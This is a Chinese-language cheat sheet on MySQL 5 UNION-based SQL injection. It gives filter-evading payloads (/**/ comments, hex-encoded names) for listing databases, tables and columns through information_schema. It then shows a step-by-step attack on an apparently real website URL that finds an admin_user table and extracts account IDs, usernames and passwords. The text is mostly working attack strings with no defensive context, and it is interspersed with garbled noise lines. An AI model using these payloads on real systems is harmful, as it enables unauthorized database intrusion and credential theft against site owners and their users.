查库
: u G" ?9 M5 [6 M8 h
0 e2 t( B+ m/ U! Sid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
5 I9 E% b5 g8 m2 w4 f4 G# @* t4 s( c
查表
# h4 Y9 g/ j; J" u# e' {$ F+ \3 y( A6 r$ C( N, A9 o
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
- g4 h: N0 ~4 G ]3 M- ]. G) p0 l1 J$ F( i' H. b
查段
7 \0 E) i1 s, k: {1 M" O* t& l! ^; |* |% V" t
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,15 P1 D; N. ~8 p: i
8 g3 R, i z; g& |. A+ w8 V- q! X5 t* X& d3 d0 Q8 Y
mysql5高级注入方法暴表0 E8 K8 ]8 j" |+ G: {4 _, b
6 G; A" K* E* }' i3 J. w5 I$ y7 k例子如下:. h8 F1 o5 g9 y4 f8 s
* F. a$ B8 X. r' y1.爆表8 Y$ `& T+ N' X6 F% f; b
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)* A+ d8 Q( F# o8 K% z( [$ s
这样爆到第4个时出现了admin_user表。
& M" v+ n3 e S7 K4 e+ Y1 f, H# a( b5 u, x6 r p
2.暴字段
. ?5 j* M' ]% o. w2 e. ~http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
! V7 h \1 u- r7 f0 S2 X2 u
$ L7 o! ^0 }2 {+ ^* ]6 [5 E$ d" l3 R( C1 Y) T( `2 }, ~
3.爆密码
! R# w1 M: C' G7 }# Q# Q8 e+ Chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
: m: q1 S- k* M) ]# K6 N# _. o2 q* K3 w$ S1 j/ c$ }% u0 r4 T. q/ i
$ L, L$ \* ?7 A; G. b% l0 s
|